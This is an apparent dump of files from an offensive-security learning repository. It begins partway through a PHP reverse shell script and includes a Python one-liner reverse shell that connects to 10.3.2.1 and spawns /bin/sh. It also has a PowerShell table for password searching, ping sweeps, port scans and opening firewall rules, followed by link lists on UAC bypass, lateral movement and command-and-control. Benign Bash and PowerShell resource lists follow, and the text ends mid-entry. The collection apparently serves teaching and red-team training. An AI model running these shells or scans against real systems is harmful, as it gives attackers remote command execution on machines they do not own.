stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { // Check for end of TCP connection if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } // Check for end of STDOUT if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } // Wait until a command is end down $sock, or some // command output is available on STDOUT or STDERR $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send // data to process's STDIN if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } // If we can read from the process's STDOUT // send data down tcp connection if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } // If we can read from the process's STDERR // send data down tcp connection if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); // Like print, but does nothing if we've daemonised ourself // (I can't figure out how to redirect STDOUT like a proper daemon) function printit ($string) { if (!$daemon) { print "$string\n"; } } ?>
Markdown
h4cker/post_exploitation/powershell_commands.md
| PowerShell Command | Description | |----------------------------------------------|------------------------------------| | `Get-ChildItem` | Lists directories | | `Copy-Item sourceFile.doc destinationFile.doc` | Copies a file (cp, copy, cpi) | | `Move-Item sourceFile.doc destinationFile.doc` | Moves a file (mv, move, mi) | | `Select-String –path c:\users\*.txt –pattern password` | Finds text within a file | | `Get-Content omar_s_passwords.txt` | Prints the contents of a file | | `Get-Location` | Gets the present directory | | `Get-Process` | Gets a process listing | | `Get-Service` | Gets a service listing | | `Get-Process \| Export-Csvprocs.csv` | Exports output to a comma-separated values (CSV) file | | `1..255 \| % {echo "10.1.2.$_"; ping -n 1 -w 100 10.1.2.$_ \| SelectString ttl}` | Launches a ping sweep to the 10.1.2.0/24 network | | `1..1024 \| % {echo ((new-object Net.Sockets.TcpClient).Connect("10.1.2.3",$_))"Port $_ is open!"} 2>$null` | Launches a port scan to the 10.1.2.3 host (scans for ports 1 through 1024) | | `Get-HotFix` | Obtains a list of all installed hotfixes | | `cd HKLM:` and then `ls` | Navigates the Windows registry | | `Get-NetFirewallRule –all` or `New-NetFirewallRule -Action Allow -DisplayName LetMeIn-RemoteAddress 10.6.6.6` | Lists and modifies the Windows firewall rules | | `Get-Command` | Gets a list of all available commands |
Python
h4cker/post_exploitation/python-reverse.py
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.3.2.1",1338));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Markdown
h4cker/post_exploitation/README.md
# Post Exploitation Resources ## Lateral movement * [Eventvwr File-less UAC Bypass CNA](https://www.mdsec.co.uk/2016/12/cna-eventvwr-uac-bypass/) * [Lateral movement using excel application and dcom](https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/) * [WSH Injection: A Case Study](https://posts.specterops.io/wsh-injection-a-case-study-fd35f79d29dd) * [Fileless UAC Bypass using sdclt](https://posts.specterops.io/fileless-uac-bypass-using-sdclt-exe-3e9f9ad4e2b3) * [Bypassing AMSI via COM Server Hijacking](https://posts.specterops.io/bypassing-amsi-via-com-server-hijacking-b8a3354d1aff) * [Window 10 Device Guard Bypass](https://github.com/tyranid/DeviceGuardBypasses) * [My First Go with BloodHound](https://blog.cobaltstrike.com/2016/12/14/my-first-go-with-bloodhound/) * [OPSEC Considerations for beacon commands](https://blog.cobaltstrike.com/2017/06/23/opsec-considerations-for-beacon-commands/) * [Agentless Post Exploitation](https://blog.cobaltstrike.com/2016/11/03/agentless-post-exploitation/) * [Windows Access Tokens and Alternate credentials](https://blog.cobaltstrike.com/2015/12/16/windows-access-tokens-and-alternate-credentials/) * [PSAmsi - An offensive PowerShell module for interacting with the Anti-Malware Scan Interface in Windows 10](http://www.irongeek.com/i.php?page=videos/derbycon7/t104-psamsi-an-offensive-powershell-module-for-interacting-with-the-anti-malware-scan-interface-in-windows-10-ryan-cobb) * [Lay of the Land with BloodHound](http://threat.tevora.com/lay-of-the-land-with-bloodhound/) * [Bringing the hashes home with reGeorg & Empire](https://sensepost.com/blog/2016/bringing-the-hashes-home-with-regeorg-empire/) * [Intercepting passwords with Empire and winning](https://sensepost.com/blog/2016/intercepting-passwords-with-empire-and-winning/) * [Outlook Home Page – Another Ruler Vector](https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/) * [Outlook Forms and Shells](https://sensepost.com/blog/2017/outlook-forms-and-shells/) * [Windows Privilege Escalation Checklist](https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md) * [A Guide to Configuring Throwback](https://silentbreaksecurity.com/throwback-thursday-a-guide-to-configuring-throwback/) * [Abusing DNSAdmins privilege for escalation in Active Directory](http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html) * [Using SQL Server for attacking a Forest Trust](http://www.labofapenetrationtester.com/2017/03/using-sql-server-for-attacking-forest-trust.html) * [Extending BloodHound for Red Teamers](https://www.youtube.com/watch?v=Pn7GWRXfgeI) * [Pass hash pass ticket no pain](http://resources.infosecinstitute.com/pass-hash-pass-ticket-no-pain/) * [process doppelganging](https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/) * [App Locker ByPass List](https://github.com/api0cradle/UltimateAppLockerByPassList) * [Windows 7 UAC whitelist](http://www.pretentiousname.com/misc/win7_uac_whitelist2.html) * [Malicious Application Compatibility Shims,](https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf) * [Junfeng Zhang from WinSxS dev team blog,](https://blogs.msdn.microsoft.com/junfeng/) * [Beyond good ol' Run key, series of articles,](http://www.hexacorn.com/blog) * [KernelMode.Info UACMe thread,](http://www.kernelmode.info/forum/viewtopic.php?f=11&t=3643) * [Command Injection/Elevation - Environment Variables Revisited,](https://breakingmalware.com/vulnerabilities/command-injection-and-elevation-environment-variables-revisited) * ["Fileless" UAC Bypass Using eventvwr.exe and Registry Hijacking,](https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/) * [Bypassing UAC on Windows 10 using Disk Cleanup,](https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/) * [Using IARPUninstallStringLauncher COM interface to bypass UAC,](http://www.freebuf.com/articles/system/116611.html) * [Bypassing UAC using App Paths,](https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/) * ["Fileless" UAC Bypass using sdclt.exe,](https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/) * [UAC Bypass or story about three escalations,](https://habrahabr.ru/company/pm/blog/328008/) * [Exploiting Environment Variables in Scheduled Tasks for UAC Bypass,](https://tyranidslair.blogspot.ru/2017/05/exploiting-environment-variables-in.html) * [First entry: Welcome and fileless UAC bypass,](https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/) * Reading Your Way Around UAC in 3 parts: [Part 1.](https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-1.html) [Part 2.](https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-2.html) [Part 3.](https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-3.html) * [Research on CMSTP.exe,](https://msitpros.com/?p=3960) * [hiding registry keys with psreflect](https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353) * [a guide to attacking domain trusts](https://posts.specterops.io/a-guide-to-attacking-domain-trusts-971e52cb2944) ## Living Off The Land, Bins, and Useful Scripts * [GTFO Bins](https://gtfobins.github.io/) * [LOLBAS](https://github.com/LOLBAS-Project/LOLBAS) ## Command and Control * [C2 Matrix](https://www.thec2matrix.com/) * [Red Team Infrastructure Wiki](https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki) * [How to Build a C2 Infrastructure with Digital Ocean – Part 1](https://www.blackhillsinfosec.com/build-c2-infrastructure-digital-ocean-part-1/) * [Infrastructure for Ongoing Red Team Operations](https://blog.cobaltstrike.com/2014/09/09/infrastructure-for-ongoing-red-team-operations/) * [Automated Red Team Infrastructure Deployment with Terraform - Part 1](https://rastamouse.me/2017/08/automated-red-team-infrastructure-deployment-with-terraform---part-1/) * [6 RED TEAM INFRASTRUCTURE TIPS](https://cybersyndicates.com/2016/11/top-red-team-tips/) * [Red Teaming for Pacific Rim CCDC 2017](https://bluescreenofjeff.com/2017-05-02-red-teaming-for-pacific-rim-ccdc-2017/) * [How I Prepared to Red Team at PRCCDC 2015](https://bluescreenofjeff.com/2015-04-15-how-i-prepared-to-red-team-at-prccdc-2015/) * [Red Teaming for Pacific Rim CCDC 2016](https://bluescreenofjeff.com/2016-05-24-pacific-rim-ccdc_2016/) * [Randomized Malleable C2 Profiles Made Easy](https://bluescreenofjeff.com/2017-08-30-randomized-malleable-c2-profiles-made-easy/) * [Cobalt Strike HTTP C2 Redirectors with Apache mod_rewrite - Jeff Dimmock](https://bluescreenofjeff.com/2016-06-28-cobalt-strike-http-c2-redirectors-with-apache-mod_rewrite/) * [High-reputation Redirectors and Domain Fronting](https://blog.cobaltstrike.com/2017/02/06/high-reputation-redirectors-and-domain-fronting/) * [TOR Fronting – Utilising Hidden Services for Privacy](https://www.mdsec.co.uk/2017/02/tor-fronting-utilising-hidden-services-for-privacy/) * [Domain Fronting Via Cloudfront Alternate Domains](https://www.mdsec.co.uk/2017/02/domain-fronting-via-cloudfront-alternate-domains/) * [The PlugBot: Hardware Botnet Research Project](https://www.redteamsecure.com/the-plugbot-hardware-botnet-research-project/) * [Attack Infrastructure Log Aggregation and Monitoring](https://posts.specterops.io/attack-infrastructure-log-aggregation-and-monitoring-345e4173044e) * [Finding Frontable Domain](https://github.com/rvrsh3ll/FindFrontableDomains) * [Apache2Mod Rewrite Setup](https://github.com/n0pe-sled/Apache2-Mod-Rewrite-Setup) * [Empre Domain Fronting](https://www.xorrior.com/Empire-Domain-Fronting/) * [Domain Hunter](https://github.com/minisllc/domainhunter) * [Migrating Your infrastructure](https://blog.cobaltstrike.com/2015/10/21/migrating-your-infrastructure/) * [Redirecting Cobalt Strike DNS Beacons](http://www.rvrsh3ll.net/blog/offensive/redirecting-cobalt-strike-dns-beacons/) * [Finding Domain frontable Azure domains - thoth / Fionnbharr (@a_profligate)](https://theobsidiantower.com/2017/07/24/d0a7cfceedc42bdf3a36f2926bd52863ef28befc.html) * [Red Team Insights on HTTPS Domain Fronting Google Hosts Using Cobalt Strike](https://www.cyberark.com/threat-research-blog/red-team-insights-https-domain-fronting-google-hosts-using-cobalt-strike/) * [Escape and Evasion Egressing Restricted Networks - Tom Steele and Chris Patten](https://www.optiv.com/blog/escape-and-evasion-egressing-restricted-networks) * [Command and Control Using Active Directory](http://www.harmj0y.net/blog/powershell/command-and-control-using-active-directory/) * [C2 with twitter](https://pentestlab.blog/2017/09/26/command-and-control-twitter/) * [C2 with DNS](https://pentestlab.blog/2017/09/06/command-and-control-dns/) * [ICMP C2](https://pentestlab.blog/2017/07/28/command-and-control-icmp/) * [C2 with Dropbox](https://pentestlab.blog/2017/08/29/command-and-control-dropbox/) * [C2 with https](https://pentestlab.blog/2017/10/04/command-and-control-https/) * [C2 with webdav](https://pentestlab.blog/2017/09/12/command-and-control-webdav/) * [C2 with gmail](https://pentestlab.blog/2017/08/03/command-and-control-gmail/) * [“Tasking” Office 365 for Cobalt Strike C2](https://labs.mwrinfosecurity.com/blog/tasking-office-365-for-cobalt-strike-c2/) * [Simple domain fronting PoC with GAE C2 server](https://www.securityartwork.es/2017/01/31/simple-domain-fronting-poc-with-gae-c2-server/) * [Using WebDAV features as a covert channel](https://arno0x0x.wordpress.com/2017/09/07/using-webdav-features-as-a-covert-channel/) * [Introducing Merlin — A cross-platform post-exploitation HTTP/2 Command & Control Tool](https://medium.com/@Ne0nd0g/introducing-merlin-645da3c635a) * [InternetExplorer.Application for C2](https://adapt-and-attack.com/2017/12/19/internetexplorer-application-for-c2/) * [C2 WebSocket](https://pentestlab.blog/2017/12/06/command-and-control-websocket/) * [C2 WMI](https://pentestlab.blog/2017/11/20/command-and-control-wmi/) * [C2 Website](https://pentestlab.blog/2017/11/14/command-and-control-website/) * [C2 Image](https://pentestlab.blog/2018/01/02/command-and-control-images/) * [C2 Javascript](https://pentestlab.blog/2018/01/08/command-and-control-javascript/) * [C2 WebInterface](https://pentestlab.blog/2018/01/03/command-and-control-web-interface/) * [Safe Red Team Infrastructure](https://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac) # Privilege Escalation - [Local Windows Privilege Escalation Checklist](https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation) - [Windows local Privilege Escalation Awesome Script (C#.exe and .bat)](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) - [Local Linux Privilege Escalation Checklist](https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist) - [Linux local Privilege Escalation Awesome Script (.sh)](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) - [LinEnum - Linux Privilege Escalation Enumeration](https://github.com/rebootuser/LinEnum)
Markdown
h4cker/programming_and_scripting_for_cybersecurity/amazing_python_references.md
# Python-related References One of the most comprehensive lists of Python-related resources is: https://github.com/vinta/awesome-python ## PySec * https://github.com/ebranca/owasp-pysec A hardened version of python created by the folks from OWASP. It makes it easier for security professionals and developers to write applications more resilient to attacks and manipulations. ## Anaconda * https://www.anaconda.com/download/ Anaconda is a free and open source distribution of the Python and R programming languages for data science and machine learning related applications.
Markdown
h4cker/programming_and_scripting_for_cybersecurity/bash_resources.md
## Books and Resources - [The Bash-Hackers Wiki](http://wiki.bash-hackers.org/doku.php) - Human-readable documentation of any kind about GNU Bash - [Bash beginner's mistakes](http://wiki.bash-hackers.org/scripting/newbie_traps) (by the Bash-Hackers Wiki) - [Bash Guide](http://mywiki.wooledge.org/BashGuide) - A bash guide for beginners. (by Lhunath) - [Bash FAQ](http://mywiki.wooledge.org/BashFAQ) - Answers most of your questions (by Lhunath) - [Bash Pitfalls](http://mywiki.wooledge.org/BashPitfalls) - Lists the common pitfalls beginners fall into, and how to avoid them - [Bash manual](http://www.gnu.org/software/bash/manual/) - Bourne-Again SHell manual - [Bash FAQ](http://tiswww.case.edu/php/chet/bash/FAQ) (by [Chet Ramey](http://tiswww.case.edu/php/chet/)) - [Advanced Bash-Scripting Guide](http://tldp.org/LDP/abs/html/) - An in-depth exploration of the art of shell scripting - [Bash Guide for Beginners](http://www.tldp.org/LDP/Bash-Beginners-Guide/html/) (by Machtelt Garrels) - [Bash Programming - Intro/How-to](http://tldp.org/HOWTO/Bash-Prog-Intro-HOWTO.html#toc) - [bash-handbook](https://github.com/denysdovhan/bash-handbook) - A handbook for those who want to learn Bash without diving in too deeply - [Google's Shell Style Guide](https://google.github.io/styleguide/shell.xml) - Reasonable advice about code style - [Sobell's Book](http://www.sobell.com/CR3/index.html) - A practical guide to commands, editors, and shell programming - [WikiBooks: Bash Shell Scripting](https://en.wikibooks.org/wiki/Bash_Shell_Scripting) - [Use the Unofficial Bash Strict Mode (Unless You Looove Debugging)](http://redsymbol.net/articles/unofficial-bash-strict-mode/) - [learnyoubash](https://github.com/denysdovhan/learnyoubash) - An interactive workshopper which will learn you how to use the terminal and write your the first Bash script. - [Defensive BASH Programming](http://www.kfirlavi.com/blog/2012/11/14/defensive-bash-programming/) - Methods to defend your programs from breaking as well as keeping the code tidy and clean. - [Pure Bash Bible](https://github.com/dylanaraps/pure-bash-bible) - A collection of pure bash alternatives to external processes. ## Command-Line Productivity - [aliases](https://github.com/sebglazebrook/aliases) - Contextual, dynamic, organized aliases for the bash shell - [bashhub](https://github.com/rcaloras/bashhub-client) - :cloud: Bash history in the cloud. Indexed and searchable. - [bashhub-server](https://github.com/nicksherron/bashhub-server) - Private cloud shell history. Open source server for bashhub. - [bashmarks](https://github.com/huyng/bashmarks) - Directory bookmarks for the shell - [commacd](https://github.com/shyiko/commacd) - A faster way to move around in Bash - [has](https://github.com/kdabir/has) - `has` helps you check presence of various command line tools and their versions on path - [hstr](https://github.com/dvorka/hstr) - Bash History Suggest Box - [qfc](https://github.com/pindexis/qfc) - File-completion widget for Bash and Zsh - [sshrc](https://github.com/Russell91/sshrc) - Bring your .bashrc, .vimrc, etc. with you when you SSH ## Customization - [bash-git-prompt](https://github.com/magicmonty/bash-git-prompt) - An informative and fancy Bash prompt for Git users - [bash-powerline](https://github.com/riobard/bash-powerline) - Powerline-style Bash prompt in pure Bash script - [bashstrap](https://github.com/barryclark/bashstrap) - A quick way to spruce up OSX terminal - [git-prompt](https://github.com/lvv/git-prompt) - Bash prompt with Git, SVN and HG modules - [gittify](https://github.com/momeni/gittify) - A colorful Bash prompt + customized Git aliases - [liquidprompt](https://github.com/nojhan/liquidprompt) - A full-featured & carefully designed adaptive prompt for Bash & Zsh - [mysql-colorize](https://github.com/horosgrisa/mysql-colorize.bash) - Colorization for mysql comand-line client - [oh-my-git](https://github.com/arialdomartini/oh-my-git) - An opinionated git prompt for bash and zsh - [progress-bar.sh](https://github.com/edouard-lopez/progress-bar.sh) - Simple & sexy progressbar for `bash`, give it a duration and it will do the rest ![progress-bar.sh in action](http://pix.toile-libre.org/upload/original/1476311497.gif). - [sexy-bash-prompt](https://github.com/twolfson/sexy-bash-prompt) - Bash prompt with colors, Git statuses, and Git branches - [bash-sensible](https://github.com/mrzool/bash-sensible) - An attempt at saner Bash defaults ## Data - [BigBash](https://github.com/zalando/bigbash) - Open-source converter that generates a bash one-liner from an SQL Select query, no database necessary ## Parsing Logs using Bash - [Ultimate Guide to Logging and Bash Data Manipulation](https://www.loggly.com/ultimate-guide/analyzing-linux-logs/) - [Using Grep & Regular Expressions to Search for Text Patterns in Linux](https://www.digitalocean.com/community/tutorials/using-grep-regular-expressions-to-search-for-text-patterns-in-linux#regular-expressions) ## For Developers - [bocker](https://github.com/p8952/bocker) - Docker implemented in 100 lines of bash - [git-sh](https://github.com/rtomayko/git-sh) - A customized Bash environment suitable for Git work ## Downloading and Serving - [balls](https://github.com/jneen/balls) - Bash on Balls - [bashttpd](https://github.com/avleen/bashttpd) - A web server written in Bash - [Dropbox-Uploader](https://github.com/andreafabrizi/Dropbox-Uploader) - Dropbox Uploader is a Bash script which can be used to upload, download, list or delete files from Dropbox - [ngincat](https://github.com/jaburns/ngincat) - Tiny Bash HTTP server using netcat - [xiringuito](https://github.com/ivanilves/xiringuito) - SSH-based VPN for poors ## Applications - [bashblog](https://github.com/cfenollosa/bashblog) - A Bash script that handles blog posting - [pushbullet-bash](https://github.com/Red5d/pushbullet-bash) - Bash interface to the PushBullet API - [todo.sh](https://github.com/todotxt/todo.txt-cli) - A simple and extensible shell script for managing your todo.txt file - [cheapci](https://github.com/ianmiell/cheapci) - A continuous integration framework implemented in bash ## Games - [bash2048](https://github.com/mydzor/bash2048) - Bash implementation of 2048 game - [minesweeper](https://github.com/feherke/Bash-script/tree/master/minesweeper) - Bash implementation of minesweeper - [solitaire](https://opensource-usability.blogspot.com/2016/10/solitaire-in-bash-script.html) - Bash implementation of solitaire ## Website - [Bash One-Liners](http://www.bashoneliners.com/) - A collection of practical or just pure awesome bash one-liners ([repos](https://github.com/janosgyerik/bashoneliners) by @[janosgyerik](https://github.com/janosgyerik)) - [commandlinefu](http://www.commandlinefu.com/) - A repository for the most elegant and useful UNIX commands ## Shell Package Management - [bash-it](https://github.com/Bash-it/bash-it) - A community Bash framework - [basher](https://github.com/basherpm/basher) - A package manager for shell scripts - [bpkg](https://github.com/bpkg/bpkg) - A lightweight bash package manager - [homeshick](https://github.com/andsens/homeshick) - Git dotfile synchronizer written in Bash ## Shell Script Development - [ansi](https://github.com/fidian/ansi) - ANSI escape codes in pure bash - change text color, position the cursor, much more - [argbash](https://github.com/matejak/argbash) - Bash argument parsing code generator - [assert.sh](https://github.com/lehmannro/assert.sh) - Bash unit testing framework - [BashScriptTestingLibrary](https://github.com/rafritts/BashScriptTestingLibrary) - A unit testing framework for Bash scripts - [bash3boilerplate](https://github.com/kvz/bash3boilerplate) - Templates to write better Bash scripts - [bashful](https://github.com/jmcantrell/bashful) - A collection of libraries to simplify writing Bash scripts - [bashmanager](https://github.com/lingtalfi/bashmanager) - mini bash framework for creating command line tools - [bats](https://github.com/sstephenson/bats) - Bash Automated Testing System - [bash_unit](https://github.com/pgrange/bash_unit) - bash unit testing enterprise edition framework for professionals - [mo](https://github.com/tests-always-included/mo) - Mustache templates in pure bash - [semver_bash](https://github.com/cloudflare/semver_bash) - Semantic Versioning in Bash - [shfmt](https://github.com/mvdan/sh) - Format bash programs - [shunit2](https://github.com/kward/shunit2) - A unit test framework for Bash scripts with a flavour of JUnit/PyUnit - [bashing](https://github.com/xsc/bashing) - Smashing Bash into Pieces - Bash framework for creating command line tools - [shellcheck](https://github.com/koalaman/shellcheck) - ShellCheck, a static analysis tool for shell scripts
Markdown
h4cker/programming_and_scripting_for_cybersecurity/basic_programming_resources.md
# Basic Programming Resources and Tutorials ## Python - [Awesome Python - GitHub Repo](https://github.com/vinta/awesome-python) - [Python Tutorials in W3 Schools](https://www.w3schools.com/python/python_for_loops.asp) - [Full Stack Python](https://www.fullstackpython.com/) - [Python Cheatsheet](https://www.pythoncheatsheet.org/) - [Real Python](https://realpython.com) - [The Hitchhiker’s Guide to Python](https://docs.python-guide.org/) - [Ultimate Python study guide](https://github.com/huangsam/ultimate-python) - [Python @LibHunt](https://python.libhunt.com/) - [Python ZEEF](https://python.zeef.com/alan.richmond) - [Pythonic News](https://news.python.sc/) - [What the f*ck Python!](https://github.com/satwikkansal/wtfpython) ## Bash and other Linux Shells - [Awesome Shell](https://github.com/alebcay/awesome-shell) - [Bash One-Liners](http://www.bashoneliners.com/) - A collection of practical or just pure awesome bash one-liners ([repos](https://github.com/janosgyerik/bashoneliners) by @[janosgyerik](https://github.com/janosgyerik)) - [commandlinefu](http://www.commandlinefu.com/) - A repository for the most elegant and useful UNIX commands - [Stack Overflow](http://stackoverflow.com/questions/tagged/bash) - Bash tag on Stack Overflow - [/r/Bash](https://www.reddit.com/r/bash) - A subreddit dedicated to bash scripting - [/r/CommandLine](https://www.reddit.com/r/commandline) - for anything regarding the command line, in any operating system - [#bash IRC Channel](https://webchat.freenode.net/?channels=bash) - [The Bash-Hackers Wiki](http://wiki.bash-hackers.org/doku.php) - Human-readable documentation of any kind about GNU Bash - [Bash beginner's mistakes](http://wiki.bash-hackers.org/scripting/newbie_traps) (by the Bash-Hackers Wiki) - [Bash Guide](http://mywiki.wooledge.org/BashGuide) - A bash guide for beginners. (by Lhunath) - [Bash FAQ](http://mywiki.wooledge.org/BashFAQ) - Answers most of your questions (by Lhunath) - [Bash Pitfalls](http://mywiki.wooledge.org/BashPitfalls) - Lists the common pitfalls beginners fall into, and how to avoid them - [Bash manual](http://www.gnu.org/software/bash/manual/) - Bourne-Again Shell manual - [Bash FAQ](http://tiswww.case.edu/php/chet/bash/FAQ) (by [Chet Ramey](http://tiswww.case.edu/php/chet/)) - [Advanced Bash-Scripting Guide](http://tldp.org/LDP/abs/html/) - An in-depth exploration of the art of shell scripting - [Bash Guide for Beginners](http://www.tldp.org/LDP/Bash-Beginners-Guide/html/) (by Machtelt Garrels) - [Bash Programming - Intro/How-to](http://tldp.org/HOWTO/Bash-Prog-Intro-HOWTO.html#toc) - [bash-handbook](https://github.com/denysdovhan/bash-handbook) - A handbook for those who want to learn Bash without diving in too deeply - [Google's Shell Style Guide](https://google.github.io/styleguide/shell.xml) - Reasonable advice about code style - [Sobell's Book](http://www.sobell.com/CR3/index.html) - A practical guide to commands, editors, and shell programming - [WikiBooks: Bash Shell Scripting](https://en.wikibooks.org/wiki/Bash_Shell_Scripting) - [Use the Unofficial Bash Strict Mode (Unless You Looove Debugging)](http://redsymbol.net/articles/unofficial-bash-strict-mode/) - [learnyoubash](https://github.com/denysdovhan/learnyoubash) - An interactive workshopper which will teach you how to use the terminal and write your the first Bash script. - [Defensive BASH Programming](https://web.archive.org/web/20180917174959/http://www.kfirlavi.com/blog/2012/11/14/defensive-bash-programming) - Methods to defend your programs from breaking as well as keeping the code tidy and clean. - [Pure Bash Bible](https://github.com/dylanaraps/pure-bash-bible) - A collection of pure bash alternatives to external processes. ## PowerShell - [PowerShell.org](http://powershell.org/) - Forums, summits, community blog posts, and more. - [/r/PowerShell](http://www.reddit.com/r/powershell) - Reddit PowerShell community. - [Slack PowerShell team](https://poshcode.org/slack) - Large chat room dedicated to PowerShell. Bridged with `#PowerShell` on irc.freenode.net. - [Research Triangle PowerShell User Group](https://www.meetup.com/Research-Triangle-PowerShell-Users-Group/) - Very active PowerShell and automation user group. Meets on first and third Wednesdays. All skill levels welcome. - [platyPS](https://github.com/PowerShell/platyPS) - Write PowerShell External Help in Markdown. - [Invoke-CreateModuleHelpFile](https://github.com/gravejester/Invoke-CreateModuleHelpFile) - PowerShell function to create a HTML help file for a module and all it's commands. - [PScribo](https://github.com/iainbrighton/PScribo) - PowerShell documentation framework what can create HTML, Word, text files based on PowerShell-based DSL (domain specific language). - [PSKoans](https://github.com/vexx32/PSKoans) - A simple, fun, and interactive way to learn the PowerShell language through Pester unit testing. - [Jupyter-PowerShell](https://github.com/Jaykul/Jupyter-PowerShell) - Jupyter Kernel for PowerShell. - [PowerScripting](https://powershell.org/category/podcast/) - Weekly show run by Jon Walz and Hal Rottenberg. - [The PowerShell News Podcast](https://powershellnews.podbean.com/) - This podcast is the latest news on PowerShell. - [File System Security](https://gallery.technet.microsoft.com/scriptcenter/1abd77a5-9c0b-4a2b-acef-90dbb2b84e85) - Allows a much easier management of permissions on files and folders. - [PowerShellArsenal](https://github.com/mattifestation/PowerShellArsenal) - Module used to aid a reverse engineer. - [PowerTools](https://github.com/Veil-Framework/PowerTools) - Collection of projects with a focus on offensive operations. - [PowerForensics](https://github.com/Invoke-IR/PowerForensics) - Popular live disk forensics platform for windows. - [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) - Post-exploitation framework. - [PowerShellEmpire](https://github.com/PowerShellEmpire/Empire) - Post-exploitation agent. - [PSReflect](https://github.com/mattifestation/PSReflect) - Easily define in-memory enums, structs, and Win32 functions in PowerShell. Useful for attacks, [example](https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC). - [BloodHound](https://github.com/BloodHoundAD/BloodHound) - Easily identify highly complex attack paths that would otherwise be impossible to quickly identify. - [Nishang](https://github.com/samratashok/nishang) - Enables scripting for red team, penetration testing, and offensive security. - [Harness](https://github.com/Rich5/Harness) - Interactive remote PowerShell Payload. - [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation) - PowerShell Obfuscator. - [p0wnedShell](https://github.com/Cn33liz/p0wnedShell) - PowerShell Runspace Post Exploitation Toolkit. - [PESecurity](https://github.com/NetSPI/PESecurity) - Module to check if a Windows binary (EXE/DLL) has been compiled with ASLR, DEP, SafeSEH, StrongNaming, and Authenticode. - [Powershellery](https://github.com/nullbind/Powershellery) - Powershell scripts used for general hackery. - [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) - Toolkit for Attacking SQL Server. - [Getting Started With PowerShell 3.0 Jump Start](https://mva.microsoft.com/en-US/training-courses/getting-started-with-powershell-30-jump-start-8276) - Jump starts series are for IT professionals with no previous experience with PowerShell, and want to learn it fast. - [Advanced Tools & Scripting with PowerShell 3.0](https://channel9.msdn.com/Series/advpowershell3) - IT pros, take this advanced PowerShell course to find out how to turn your real time management and automation scripts into useful reusable tools and cmdlets. - [What's New in PowerShell v5](https://mva.microsoft.com/en-US/training-courses/whats-new-in-powershell-v5-16434) - Through description on some of the exciting new features in PowerShell version 5.0. - [PowerShell Open Source Project](https://channel9.msdn.com/series/PowerShell-Open-Source-Project) - Collection of videos thoroughly demonstrate how PowerShell open source project runs on Linux. - [PowerShell on Linux and Open Source](https://channel9.msdn.com/Blogs/hybrid-it-management/PowerShell-on-Linux-and-Open-Source) - Brief introduction to PowerShell open source project and how it runs on Linux. - [PowerShell](https://channel9.msdn.com/Shows/MsftPowerShell) - This show will include videos talking about the PowerShell automation platform, Desired State Configuration (DSC), infrastructure as code, and related concepts!! These videos are created by Trevor Sullivan, a Microsoft MVP for Windows PowerShell. - [Learn Windows PowerShell in a Month of Lunches - Don Jones](https://www.youtube.com/watch?v=6CRTahGYnws&list=PL6D474E721138865A) - Video companion to the book of the same title. - [Best Practices for Script Design - Don Jones](https://www.youtube.com/watch?v=Lni4KjGMgu4) - Don Jones discusses script design principles and best practices. - [PowerShell Toolmaking (1 of 3) - Don Jones](https://www.youtube.com/watch?v=KprrLkjPq_c) - Toolmaking (1 of 3) - Don Jones. - [PowerShell Toolmaking (2 of 3) - Don Jones](https://www.youtube.com/watch?v=U849a17G7Ro) - Toolmaking (2 of 3) - Don Jones. - [PowerShell Toolmaking (3 of 3) - Don Jones](https://www.youtube.com/watch?v=GXdmjCPYYNM) - Toolmaking (3 of 3) - Don Jones. - [Sophisticated Techniques of Plain Text Parsing - Tobias Weltner](https://www.youtube.com/watch?v=Hkzd8spCfCU) - Great reference for text parsing. - [Monad Manifesto Revisited - Jeffrey Snover](https://www.youtube.com/watch?v=j0EX5R2nnRI) - Jeffrey Snover reflects on the beginnings of the language and where it's going. - [AD Forensics 